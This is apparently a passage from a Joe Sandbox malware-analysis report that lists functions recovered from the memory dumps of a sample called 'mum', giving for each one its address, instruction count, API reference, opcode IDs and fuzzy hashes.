Instruction Fuzzy Hash: F041F370E05248CBDB19DFAAC95469EFBF2AF89304F24D12AD414BB3A9DB344945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E8B10 Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E8BEB

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7aa3294dd929f98cf185316fa6c31ff925f2bff78165899c2e5cfa975587f1db
Instruction ID: 9f079dc2c127c0a6fa206d6b1f97e24e48643a39990a5e2547b206264ec3db35
Opcode Fuzzy Hash: 7aa3294dd929f98cf185316fa6c31ff925f2bff78165899c2e5cfa975587f1db
Instruction Fuzzy Hash: D641F570E01248CFDB19DFAAD94069EFBB2AF89304F24D12AD418BB7A5EB345945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E1A4C Relevance: 1.6, APIs: 1, Instructions: 98COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E1B23

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 80015beadfd81cad76bbce9f6d2958347c6d874648019e15e76b9c09a6d1dd43
Instruction ID: a999642ee0953bc87f13b5c4fc3ebc4b37514eca968911e1f629f31cb0df919e
Opcode Fuzzy Hash: 80015beadfd81cad76bbce9f6d2958347c6d874648019e15e76b9c09a6d1dd43
Instruction Fuzzy Hash: BA41D370E01248CBDB19DFAAC5506EEBBF2AF89304F24D12AD414BB7A9DB345949CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E8F69 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E9043

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 47f11a003d729b51a69bb3540f331942a194bb62cd3ff3a71e05313a75e8055e
Instruction ID: ec6c99e558a1af3b1255c0be663a7c6c1ddad2f12a421350f94070d9534b254e
Opcode Fuzzy Hash: 47f11a003d729b51a69bb3540f331942a194bb62cd3ff3a71e05313a75e8055e
Instruction Fuzzy Hash: CD41E374E00248CBEB19DFAAD8546DEBBB2AF88304F24C12AD418BB7A5DB344945CF40

Uniqueness

Uniqueness Score: -1.00%

Function 003E56D0 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E57A3

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4ab30d803f4246cb7849e8b5cf94cce63763ebf98fef59a39a0b30ab42d7c69c
Instruction ID: bebb5e15fe64670dac5eedbd128fe1ff94c49c405d09b80fbb2e1a8f853af6c3
Opcode Fuzzy Hash: 4ab30d803f4246cb7849e8b5cf94cce63763ebf98fef59a39a0b30ab42d7c69c
Instruction Fuzzy Hash: 6C41E270E05648CFDB19DFAAD45069EFBB2AF88304F24D12AD414BB2A9DB344945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E0D41 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E0E1B

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 788eed8543d73d8c83cf0144a08737f272d1ce7bac1856c1ba41e53cf4faaabb
Instruction ID: a36e5713c73e98237fb8a246912ef4cba15b28bd8af1190a8748b542e1c40c5c
Opcode Fuzzy Hash: 788eed8543d73d8c83cf0144a08737f272d1ce7bac1856c1ba41e53cf4faaabb
Instruction Fuzzy Hash: 10410270E05248CBDB19DFAAD8506AEFBF2AF88300F24D12AC414BB3A9DB344945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E15F1 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 003E16CB

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 68895af53a9dfbfb4d9492122c720df7976a69953b3d23a75f2084745339a1fd
Instruction ID: 8bf96f6c8d0427a1fc56a346cd1a5b5cbec85e3aa5ed67e7b487d0e808a721df
Opcode Fuzzy Hash: 68895af53a9dfbfb4d9492122c720df7976a69953b3d23a75f2084745339a1fd
Instruction Fuzzy Hash: F841E470E01258CBDB19DFAAC5546AEFBF2AF89300F24D22AD414BB3A5DB345949CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002C3576 Relevance: .3, Instructions: 309COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9047b0b2d892f855b9d9482799bd8a9285e0fb441eaec3331c74c682614ceb0
Instruction ID: 5716f7e329ad4f2f8cc130bc4e47a72dc35ffabf07961f4e8587c268d4d8adda
Opcode Fuzzy Hash: e9047b0b2d892f855b9d9482799bd8a9285e0fb441eaec3331c74c682614ceb0
Instruction Fuzzy Hash: 3EE10174E00258CFDB14DFA4C994B9DBBB2BF89304F2481AAD809AB365DB315A85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CCA30 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: eefb7c21458f58b282e08dcbb70ede23205f89e14b88d98df3bd465c2b180fc9
Instruction ID: 7bd5aedf8124892da41805421f118e5e1da1d07ffce736f151b8d29665eacda4
Opcode Fuzzy Hash: eefb7c21458f58b282e08dcbb70ede23205f89e14b88d98df3bd465c2b180fc9
Instruction Fuzzy Hash: D5D1E274E10218CFDB14DFA5C994BADBBB2BF89304F2091AAD409AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CDFE8 Relevance: .3, Instructions: 294COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8c906c2bde32346b99f7508a21141c8603c96d13e0f7bf20f57ef4bf4273d48a
Instruction ID: 676aab372966d66a33a799c0531b7a791f7091ac8c6983a93522b72222cd7672
Opcode Fuzzy Hash: 8c906c2bde32346b99f7508a21141c8603c96d13e0f7bf20f57ef4bf4273d48a
Instruction Fuzzy Hash: A2D1E474E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD409AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CE440 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: aa72cc9b76e178c7fd5c01058aa515bbe8559e6d49a3bda357dcb71a1eceae8f
Instruction ID: a02cb707d787162696db9afa34ac0c86f6b719c65438ce783dfcdafe49f0f04c
Opcode Fuzzy Hash: aa72cc9b76e178c7fd5c01058aa515bbe8559e6d49a3bda357dcb71a1eceae8f
Instruction Fuzzy Hash: CCC1E274E10218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002C3A38 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d00abb0eae58db431ff3a84c7aa96dbd42d948a27651832ad8d3a6105350048b
Instruction ID: 911193e0aeb2fb0bfb0247ddc90e05286b3e6f773144ba6cb16eef2ab71881a6
Opcode Fuzzy Hash: d00abb0eae58db431ff3a84c7aa96dbd42d948a27651832ad8d3a6105350048b
Instruction Fuzzy Hash: C0D10374E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB365DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CD738 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 14f2532b9a39fa36b7b26f679e730a08ddba32fc7bddf7e57e21baf04267d83f
Instruction ID: 8d9ea5abd692a6cf5ee1c617bfd1b221d65e0ce887013e98013dbf805e11ffc2
Opcode Fuzzy Hash: 14f2532b9a39fa36b7b26f679e730a08ddba32fc7bddf7e57e21baf04267d83f
Instruction Fuzzy Hash: 9EC1D374E10218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CECF0 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6ae48e2bbdde9f7e93402003280ac05ffe5f57961395d42c61549d6cdfac84d3
Instruction ID: 0224469fe60e91120411f6fcc4b1306847847ad34ac2083bad2bc34d4a50322b
Opcode Fuzzy Hash: 6ae48e2bbdde9f7e93402003280ac05ffe5f57961395d42c61549d6cdfac84d3
Instruction Fuzzy Hash: B6C1F474E10218CFDB14DFA5C994B9DBBB2BF89304F2481AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CC17F Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a33461aafda98d4e12974a02c78bbe8fc0995b820fe1b2be2fed8e6237c866f8
Instruction ID: d0ded39c1caeb114399d47a1502885816a3f3bedb86c50d8320e24adaa0df230
Opcode Fuzzy Hash: a33461aafda98d4e12974a02c78bbe8fc0995b820fe1b2be2fed8e6237c866f8
Instruction Fuzzy Hash: 9AC1E274E10218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CF148 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: bcb8e9622ddcad6180ceebfb71e5f0a0c283002b7c1e60dbf3eddcba53698d9f
Instruction ID: 831d8a0a92e1ba31ddaf964752b08f05b993239fcbf187424ab3034b27dd4836
Opcode Fuzzy Hash: bcb8e9622ddcad6180ceebfb71e5f0a0c283002b7c1e60dbf3eddcba53698d9f
Instruction Fuzzy Hash: 4EC1E274E10218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CC5DC Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4ebfeb17c97d498fb9ea20a6913804172b6eddabb573ce5a03be2a109d2b67e7
Instruction ID: 21c4a8ceccb9e07e32cd846d936077c954bc15fb27abbddd263a9dad53dd360c
Opcode Fuzzy Hash: 4ebfeb17c97d498fb9ea20a6913804172b6eddabb573ce5a03be2a109d2b67e7
Instruction Fuzzy Hash: FCC1D174E10218CFDB14DFA5C994B9DBBB2BF89304F2091AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CCE88 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f3c0a97e46107e65545b211e4abf66800149964c0478d75e616c067d22a0ad1b
Instruction ID: 29b4bb20ce25f931cbe64bb36499ccac6fab2ff3c6f3d450c71d75156d97a5f1
Opcode Fuzzy Hash: f3c0a97e46107e65545b211e4abf66800149964c0478d75e616c067d22a0ad1b
Instruction Fuzzy Hash: EAC1D374E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002C42F9 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b16c26bc6e9234e6afd7cfd18738579659f774edb95807fcfeb1e6e79e8b5f5a
Instruction ID: 07c0a2b725948733db3d984fa30a796f31a4433d3d6b724cdb320d8a4b31164f
Opcode Fuzzy Hash: b16c26bc6e9234e6afd7cfd18738579659f774edb95807fcfeb1e6e79e8b5f5a
Instruction Fuzzy Hash: 62D1F374E10218CFDB14DFA5D994B9DBBB2BF89304F2091AAD809AB365DB345E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CDB90 Relevance: .3, Instructions: 274COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 769f869fecae195ef31460d917fd1f278d5927081fbbbe6d7470de17d4d47f00
Instruction ID: d07f7b123506250aa41112961dcc523923b8d3d000c0f553c3260ea764726728
Opcode Fuzzy Hash: 769f869fecae195ef31460d917fd1f278d5927081fbbbe6d7470de17d4d47f00
Instruction Fuzzy Hash: FBC1D374E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002C3E98 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 06f1b0d1c1286902aaae7374cc24c60af1adf57fdd3b01531d52128116a2aa75
Instruction ID: cb1695b6185cd6505434b79e4be213cb53913c80150560cca3421944e8c06c91
Opcode Fuzzy Hash: 06f1b0d1c1286902aaae7374cc24c60af1adf57fdd3b01531d52128116a2aa75
Instruction Fuzzy Hash: 8DD10374E10218CFDB14DFA5C994B9DBBB2BF88304F2081AAD809AB365DB345E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CD2E0 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 81b63294b02b79a0b9577ed802f056563cfaf384e0360fce359ea01c32395051
Instruction ID: 0f12f6687b7b8f8c3ac3799bb94f54814aee4f51b8f3d2c4a15025f8771690e0
Opcode Fuzzy Hash: 81b63294b02b79a0b9577ed802f056563cfaf384e0360fce359ea01c32395051
Instruction Fuzzy Hash: 24C1D374E10218CFDB14DFA5D994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002C4758 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e871d3782a66e5a94a582cc2c45dae6850994d7c147b5e757326416f591b203
Instruction ID: 731af546ba7ed0b8784d845e823e60ffb761a53b0107bb213c166cb0ef9253b9
Opcode Fuzzy Hash: 5e871d3782a66e5a94a582cc2c45dae6850994d7c147b5e757326416f591b203
Instruction Fuzzy Hash: B6D1E274E10218CFDB14DFA5D994B9DBBB2BF89304F2091AAD809AB355DB349E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CE89C Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f5d7f7896324f76e157e3124216a8a5fc8c63c3987c759bcde1b202f742dd22c
Instruction ID: 8933abf1942a64fcce547302818a340ea6b8246063d5e19fb104ab7eef4f872d
Opcode Fuzzy Hash: f5d7f7896324f76e157e3124216a8a5fc8c63c3987c759bcde1b202f742dd22c
Instruction Fuzzy Hash: 2AC1D374E10218CFDB14DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002CF5A4 Relevance: .3, Instructions: 271COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 5829e31506eea6dc950447d47a6bef6b8637057d9ce60a8e1caa7b0c6733243f
Instruction ID: 0b54370309306cd69effd4dc06c54f359661c00290a903601550ccb07f09108e
Opcode Fuzzy Hash: 5829e31506eea6dc950447d47a6bef6b8637057d9ce60a8e1caa7b0c6733243f
Instruction Fuzzy Hash: A7C1E374E10218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002CF9FB Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a4044d979d3b8f06063d8e90167786a27836bbdddeb2bc9820c612b21f968db3
Instruction ID: 4654f357f93f256770d947025dd29b9f6ae85d4af74c88ff39a856ad22b18bd1
Opcode Fuzzy Hash: a4044d979d3b8f06063d8e90167786a27836bbdddeb2bc9820c612b21f968db3
Instruction Fuzzy Hash: 46C1E374E10218CFDB54DFA5C994B9DBBB2BF89304F2081AAD809AB355DB359E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002C2A90 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8701ea3c602e6360ef6c00f30d52b9bab6ccf689105715c7b9e3d2a351b3985
Instruction ID: d8286f2b6b749b461b57b3e3a1f17f5e2550a007e5ee5f9cd616348b280fb8c9
Opcode Fuzzy Hash: b8701ea3c602e6360ef6c00f30d52b9bab6ccf689105715c7b9e3d2a351b3985
Instruction Fuzzy Hash: 28A11574D10208CFDB14DFA9C984BDDBBB1BF88314F249269E509AB3A1DB709988CF55

Uniqueness

Uniqueness Score: -1.00%

Function 002C2DD1 Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53547ae15153e2d51d0bb945c55153d7c73422b1ed428826b52bcf68567ef6cf
Instruction ID: 5c8bdafec882aff6b8936574a65a211eeb8e784131f038d95bbc8e77a14bc0a1
Opcode Fuzzy Hash: 53547ae15153e2d51d0bb945c55153d7c73422b1ed428826b52bcf68567ef6cf
Instruction Fuzzy Hash: 5D91F274D10208CFDB10DFA9C884BEDBBB1BF48314F249269E509BB291DB759A88CF55

Uniqueness

Uniqueness Score: -1.00%

Function 002CBBF8 Relevance: 1.6, APIs: 1, Instructions: 124COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL(000000FF), ref: 002CBD5A

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: be28dc0d70ee774896ca0001398661176ed18f871aee912647e4d442770b5053
Instruction ID: b43515a2976bb3b39a1282ebd1be7130d2e8d7b38847bd906b808d4d071d6007
Opcode Fuzzy Hash: be28dc0d70ee774896ca0001398661176ed18f871aee912647e4d442770b5053
Instruction Fuzzy Hash: 825113B4D10208CFDB18CFAAD848BDDBBB2BF89314F24D62AE415AB294D7749945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002CBD93 Relevance: 1.6, APIs: 1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e8975139b6724760d17ce5d08534419634c48f6978c0ffab4b8749b469ba483
Instruction ID: 8638d35968fd843e0c431c78a5ec4706b78381245636039455fd5b3ac1c1dccc
Opcode Fuzzy Hash: 7e8975139b6724760d17ce5d08534419634c48f6978c0ffab4b8749b469ba483
Instruction Fuzzy Hash: D7510EB4D24208CFCF15CFA9D485BECBBB1BF49324F209629E016AB294D7749885CF10

Uniqueness

Uniqueness Score: -1.00%

Function 0026D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1275732887.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_26d000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ea2e938cb5b0ac138bc68ba5cf047d42b82952f38099675c07a4f6deda9ce31
Instruction ID: b0871400e81c65e95e870ee6db5ff4b4621e80bcc769a88f0d244127603c7f3b
Opcode Fuzzy Hash: 7ea2e938cb5b0ac138bc68ba5cf047d42b82952f38099675c07a4f6deda9ce31
Instruction Fuzzy Hash: 0A210475B14248DFCB14DF24D884B26BB65FB88318F34C569E9094B246C37BD8A7CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0026D017 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1275732887.000000000026D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0026D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_26d000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4a114d01c5a5f1a03a97ba52f97c9c692c46633ee86330d709a000a397d3c51a
Instruction ID: b232496d96a1d1200f7422c6c89cc5945a8d6502b11f86c663d7cabdab831b68
Opcode Fuzzy Hash: 4a114d01c5a5f1a03a97ba52f97c9c692c46633ee86330d709a000a397d3c51a
Instruction Fuzzy Hash: 2C119075A04284DFCB15CF14D5C4B15FF61FB84314F24C6A9D8094B656C33BD85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 002C1B48 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8162e0d684fa739037c6c05b1ac6c6760afb43865408a1ce151ad15b14d1b3b7
Instruction ID: be106b4297b648394b91b9ed051628f22268afd704c46836a187217add7feb81
Opcode Fuzzy Hash: 8162e0d684fa739037c6c05b1ac6c6760afb43865408a1ce151ad15b14d1b3b7
Instruction Fuzzy Hash: 5152CC74A01228CFDB64DF69C890BDDBBB2BB89304F1485EAD509A7354DB309E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 003E3498 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1277129741.00000000003E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 003E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_3e0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d29687f8f1a0c044653f1b830bebba04522e590254b42c9461f36318d1cbe90d
Instruction ID: a86fc8abe6a06e02f9bce7f7368c964b2cc9f90e24c138ca5858832869620661
Opcode Fuzzy Hash: d29687f8f1a0c044653f1b830bebba04522e590254b42c9461f36318d1cbe90d
Instruction Fuzzy Hash: 37B1B474E00218CFCB54DFA9D894A9DBBB2FF89304F2181A9D919AB365DB30AD41CF10

Uniqueness

Uniqueness Score: -1.00%

Function 002C217A Relevance: .2, Instructions: 193COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.1276085509.00000000002C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_2c0000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b0f78734b5936fda779f449d78211a98da13986b53c229d29fbe828c613f0f2
Instruction ID: 371753c00d26b20ac0aa051b4328e8f6d3bbdb3b1e9709cc8841dec261ee89bc
Opcode Fuzzy Hash: 8b0f78734b5936fda779f449d78211a98da13986b53c229d29fbe828c613f0f2
